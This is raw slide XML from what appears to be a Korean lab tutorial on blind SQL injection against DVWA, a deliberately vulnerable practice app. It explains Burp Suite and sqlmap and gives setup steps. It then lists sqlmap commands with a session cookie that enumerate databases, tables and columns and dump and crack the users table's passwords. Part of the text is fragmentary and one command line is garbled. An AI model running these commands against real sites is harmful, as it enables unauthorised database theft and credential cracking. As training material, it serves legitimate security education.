              <a:latin typeface="DX국민시대"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/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/>
                <a:ea typeface="나눔스퀘어_ac Bold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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580104" y="5848167"/>
            <a:ext cx="5697789" cy="3208987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ts val="24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BURP SUITE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?</a:t>
            </a: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ts val="24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1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ts val="26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Burp Suite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는 프록시를 사용하여 네트워크에서 통신하는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HTTP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request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를 가로채 분석 및 수정할 수 있으며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,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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그 외에도 다양한 기능을 이용해 웹 애플리케이션의 취약점을 테스트하거나 해킹 공격을 수행할 수 있는 점검 도구이다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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0749" y="2112975"/>
            <a:ext cx="5656500" cy="3465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117B8AFA-974B-43DB-B5AC-0BCA7AC2861B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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508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/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="제목 3"/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ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Security Level : Low</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/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/>
                <a:ea typeface="나눔스퀘어_ac Bold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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539284" y="4952999"/>
            <a:ext cx="5806647" cy="4403511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SQLMAP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이란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?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ts val="24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ts val="24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SQLmap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은 프로세스 자동탐지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SQL Injection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관련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exploiting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그리고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서버에 대한 질의를 수행하는 오픈 소스 침투 테스트 툴이다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ts val="24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강력한 탐지 엔진을 탑재한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SQLmap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은 많은 취약점에 대한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침투테스터로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사용되며 데이터 베이스를 탐지 하는 광범위한 옵션을 가지고 있으며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데이터베이스에서 데이터를 가져오고 기본 파일 시스템에 접근하여 운영체제를 통한 연결로 명령어를 수행한다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.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28291" y="2055749"/>
            <a:ext cx="5201418" cy="2897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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508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/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="제목 3"/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ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Security Level : Low</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/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/>
                <a:ea typeface="나눔스퀘어_ac Bold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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="4569272"/>
            <a:ext cx="5913238" cy="767456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720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Burp Suite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을 이용하여 공격대상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URL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과 쿠키 값을 확인하여</a:t>
            </a:r>
          </a:p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Sqlmap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 –u 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공격대상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URL” –cookie=“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사이트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쿠키값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“</a:t>
            </a:r>
          </a:p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에 적용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나눔스퀘어_ac Bold"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p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0300" y="1925205"/>
            <a:ext cx="4657399" cy="24725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텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="5374815"/>
            <a:ext cx="5913238" cy="112124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＊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DVWA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훈련장은 로그인을 해야만 서비스를 이용할 수 있습니다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또한 인증을 지속하려면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세션쿠키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(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세션키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)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가 필요합니다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그리고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DVWA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의 보안수준 또한 쿠키에서 설정하고 있으므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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쿠키값을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전달하여야 합니다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.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때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1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sqlmap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에서는 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–-cookie </a:t>
            </a:r>
            <a:r>
              <a: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옵션을 이용해야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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pic>
        <p:nvPicPr>
          <p:cNvPr id="25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381" y="6821282"/>
            <a:ext cx="5901778" cy="4337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472381" y="7526599"/>
            <a:ext cx="5913238" cy="1115418"/>
          </a:xfr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en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t> -u "http://192.168.131.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>sqli_blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>/?id=1&amp;Submit=Submit" --cookie "security=low; PHPSESSID=cms95nrcs5khjsdmq057nn1gc2" -p id“ </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="나눔스퀘어_ac Bold"/>
              <a:ea typeface="나눔스퀘어_ac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B6C6F0-1C56-4DF9-930F-5F1F7620B89B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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="5080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/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="제목 3"/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altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Security Level : Low</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="5705108"/>
            <a:ext cx="5913238" cy="3732063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>이 변수에서 취약점을 발견하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>공격이 가능한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>상태라는걸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>알수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t> 있게 됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:latin typeface="나눔스퀘어_ac Bold"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>＊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>-based blind :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Blind SQL Injection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은 데이터베이스로부터 특정한 값이나 데이터를 전달받지 않고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, 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단순히 참과 거짓의 정보만 알 수 있을 때 사용한다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. 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로그인 폼에 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SQL Injection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이 가능하다고 가정 했을 때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, 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서버가 응답하는 로그인 성공과 로그인 실패 메시지를 이용하여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, DB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의 테이블 정보 등을 추출해 낼 수 있다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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:latin typeface="나눔스퀘어_ac Bold"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>＊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>error –based : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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공격 기법은 여러 가지가 있는데 논리적 에러를 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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은 가장 많이 쓰이고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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대중적인 공격 기법이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:latin typeface="나눔스퀘어_ac Bold"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>＊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="나눔스퀘어_ac Bold"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>time-based blind : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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Time Based SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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도 마찬가지로 서버로부터 특정한 응답 대신에 참 혹은 거짓의 응답을 통해서 데이터베이스의 정보를 유추하는 기법이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="applesdgothicneo-ultralight"/>
                <a:ea typeface="나눔스퀘어_ac Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
              <a:latin typeface="나눔스퀘어_ac Bold"/>
              <a:ea typeface="나눔스퀘어_ac Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5"/>
          <p:cNvSpPr txBox="1"/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/>
                <a:ea typeface="나눔스퀘어_ac Bold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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="5495086"/>
            <a:ext cx="5913238" cy="767456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나눔스퀘어_ac Bold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2381" y="1763023"/>
            <a:ext cx="5901778" cy="3883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1166810" y="2465672"/>
            <a:ext cx="1281113" cy="1674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/>
              <a:cs typeface="+mn-cs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72365" y="2978344"/>
            <a:ext cx="776289" cy="1674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66810" y="3891192"/>
            <a:ext cx="1081090" cy="1674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DVWA-2.0.1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0F4EB586-12E9-467B-BF35-E17D683D884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" t="-2930" r="-442" b="-48388"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968499"/>
            <a:ext cx="5911850" cy="4781435"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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336775"/>
            <a:ext cx="5913238" cy="430251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https://github.com/ethicalhack3r/DVWA/releases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DVWA-2.0.1 Source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code(zip)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받아준다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cp /root/Downloads/DVWA-2.0.1.zip /root/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옮겨주고 압축을 푼다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mv DVWA-2.0.1 /opt/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lampp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htdocs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옮겨준다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/opt/lamp/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htdocs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/config/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config.inc.php.dist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config.inc.php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변환시킨다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XAMPP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manage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server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restart all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눌러준다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49E1E81E-4BD1-453A-9332-294889E435F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3295901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8CCAE2B-BEC7-41EC-9980-09D6C3243A04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/>
                <a:ea typeface="나눔스퀘어_ac Bold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1487" y="1766895"/>
            <a:ext cx="6005513" cy="1016393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#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sqlmap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 -u "http://192.168.131.1/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dvwa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/vulnerabilities/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sqli_blind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/?id=1&amp;Submit=Submit" --cookie "security=low; PHPSESSID=cms95nrcs5khjsdmq0                                                                                57nn1gc2" -p id –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dbs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 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72E708E6-0061-42D3-AEF0-EED3857D99BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="8138598"/>
            <a:ext cx="5913238" cy="767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명령 실행 후 대기화면에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sqlmap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이 접근 가능한 데이터 목록을 출력한다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AE3C1C-2942-43CC-AF3D-F0F0C21E6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2719395"/>
            <a:ext cx="5915025" cy="60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D31E4B1-339D-47EB-93C5-B8797BC48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12" y="4969490"/>
            <a:ext cx="3838575" cy="2543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21F04A55-91C2-4992-B43D-E5E2DAD0CFB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380106" y="3503613"/>
            <a:ext cx="6005513" cy="10163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-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dbs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옵션을 사용하면 접근이 가능한 데이터베이스 목록을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추출할수있다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95740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826F30-4ED6-4BE7-BF04-D56C8339A848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/>
                <a:ea typeface="나눔스퀘어_ac Bold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1487" y="1718443"/>
            <a:ext cx="6005513" cy="1260284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#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sqlmap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 -u "http://192.168.131.1/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dvwa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/vulnerabilities/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sqli_blind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/?id=1&amp;Submit=Submit" --cookie "security=low; PHPSESSID=cms95nrcs5khjsdmq057nn1d/?id=1&amp;Submit=Submit" --cookie "security=low; PHPSESSID=cms95nrcs5khjsdmq057nn1gc2" -p id -D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dvwa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 --tables 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72E708E6-0061-42D3-AEF0-EED3857D99BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7455136"/>
            <a:ext cx="5913238" cy="767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명령어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실행후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dvwa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데이터베이스에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guestbook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users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라는 테이블이 있음을 확인 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A9D1E1-FFE1-429A-BBDD-D51D77851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992846"/>
            <a:ext cx="5829300" cy="638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0DC708A2-A8FC-4260-8039-73D0A31F9072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3792303"/>
            <a:ext cx="6005513" cy="126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DVWA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의 데이터베이스를 확인 했으니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–D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옵션으로 데이터베이스를 지정하고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–tables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옵션을 추가해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dvwa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데이터베이스의 테이블 목록을 확인한다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22D77A-50A9-481F-9BFC-82775E7D0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5129875"/>
            <a:ext cx="4429125" cy="18478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27886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6A27E5-F785-49A4-8D95-3CB085A0A3B5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/>
                <a:ea typeface="나눔스퀘어_ac Bold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1487" y="2082798"/>
            <a:ext cx="6005513" cy="1067905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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#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sqlmap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 -u "http://192.168.131.1/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dvwa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/vulnerabilities/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sqli_blind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/?id=1&amp;Submit=Submit" --cookie "security=low; PHPSESSID=cms95nrcs5khjsdmq057nn1gc2" -p id -D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dvwa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 -T users --columns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640889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72E708E6-0061-42D3-AEF0-EED3857D99BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7819491"/>
            <a:ext cx="5913238" cy="767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명령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실행후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user_id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password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등 여러 컬럼들이 존재 함을 확인할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 </a:t>
            </a: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0DC708A2-A8FC-4260-8039-73D0A31F9072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3973209"/>
            <a:ext cx="6005513" cy="1260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-T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옵션으로 테이블을 지정하고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–columns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옵션을 추가해 테이블의 컬럼 목록을 확인하도록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4DF8A85-DE53-4549-B319-2F15DD92C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3140973"/>
            <a:ext cx="5857875" cy="57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C6ADDB-C574-4624-B069-14FB95EA05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287" y="5132822"/>
            <a:ext cx="3019425" cy="23907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068643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D175AF1-F8CA-49E5-9ADA-249A9DD88635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/>
                <a:ea typeface="나눔스퀘어_ac Bold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1487" y="1860882"/>
            <a:ext cx="6005513" cy="1067905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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sqlmap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 -u "http://192.168.131.1/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dvwa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/vulnerabilities/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sqli_blind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/?id=1&amp;Submit=Submit" --cookie "security=low; PHPSESSID=cms95nrcs5khjsdmq057nn1gc2" -p id -D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/>
              </a:rPr>
              <a:t>dvwa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/>
              </a:rPr>
              <a:t> -T users --dump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640889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72E708E6-0061-42D3-AEF0-EED3857D99BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7819490"/>
            <a:ext cx="5913238" cy="1372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덤프가 완료되고 해시의 복호화까지 완료했다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User_id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번호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이름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비밀번호 등과 같이 데이터베이스 탈취에 성공하였으며 이정보를 이용해 실제로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dvwa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에 로그인이 가능하다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0DC708A2-A8FC-4260-8039-73D0A31F9072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3823342"/>
            <a:ext cx="6005513" cy="12602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컬럼 목록까지 확인 하였으므로 원하는 정보들을 탈취하기 위해 덤프를 실행한다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이과정에서 패스워드도 같이 덤프가 되는데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Sqlmp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이 이 패스워드 해시의 크랙을 같이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진행할것인지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질의한다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예를 입력해준다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A1E6D7-48DF-4660-BC50-81E7B5E5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2928787"/>
            <a:ext cx="5857875" cy="581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2D193A-0DAB-4FCD-B790-E3D9FDFB95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6" y="5397156"/>
            <a:ext cx="6038823" cy="20479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004472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3D7E4447-AC07-4E92-B43C-AA642DBD91F2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/>
                <a:ea typeface="나눔스퀘어_ac Bold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640889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72E708E6-0061-42D3-AEF0-EED3857D99BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396179" y="5239862"/>
            <a:ext cx="5913238" cy="802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다음과 같이 탈취한 데이터베이스정보는 위에 경로로 가서 확인할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DFD124-3D21-47AD-97B8-B2F7AA449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76" y="4478359"/>
            <a:ext cx="5958930" cy="644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498BE0E-81E4-4D10-A385-FA35AEA5F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6" y="6109517"/>
            <a:ext cx="6178868" cy="23097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389F68CE-6E81-4DAE-B999-B59A2383C38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417580" y="8654264"/>
            <a:ext cx="5913238" cy="8027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경로를 확인한후 경로를 따라 가면 위와 같이 탈취한  정보들을 볼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48908F-B65A-4FCD-A6AA-A3F8C33924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0" y="1743075"/>
            <a:ext cx="6080358" cy="20043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C96D47-1638-476C-8421-BCBDC1AF8244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="3889829"/>
            <a:ext cx="595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복호화된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패스워드 상태를 확인 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8457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7B86F241-5719-428D-AEA2-627DC3E5EA74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2" y="1813195"/>
            <a:ext cx="2715320" cy="53654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/>
              </a:rPr>
              <a:t>Security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/>
              </a:rPr>
              <a:t>Level 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/>
              </a:rPr>
              <a:t>Medium</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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720802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D15D5D64-8FEA-4030-A7D6-E1DDF14D33E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="8125486"/>
            <a:ext cx="5913236" cy="13393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Low level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과 다른 점은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medium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레벨에서는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POST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방식이므로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사용자의 입력을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–data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옵션에 전달한다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313BBC80-6E23-41B9-A9EE-CF1817194E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512791" y="1813195"/>
            <a:ext cx="2766117" cy="7982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※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Medium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레벨에서는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POST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방식으로 사용자 입력을 전달한다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204E5E-E3D6-47E0-BFA7-97BCB2767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934" y="2416467"/>
            <a:ext cx="4146132" cy="2279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19E193-9C27-4749-A9E9-3EA09430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4763162"/>
            <a:ext cx="5810250" cy="3362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0345247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D08E5A-7C6C-43B7-A050-D953F5851C5E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625600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D15D5D64-8FEA-4030-A7D6-E1DDF14D33E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599378" y="3446481"/>
            <a:ext cx="5913236" cy="127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Medium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실습하기전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rm -rf ~/.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sqlmap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/output/192.168.131.1/</a:t>
            </a:r>
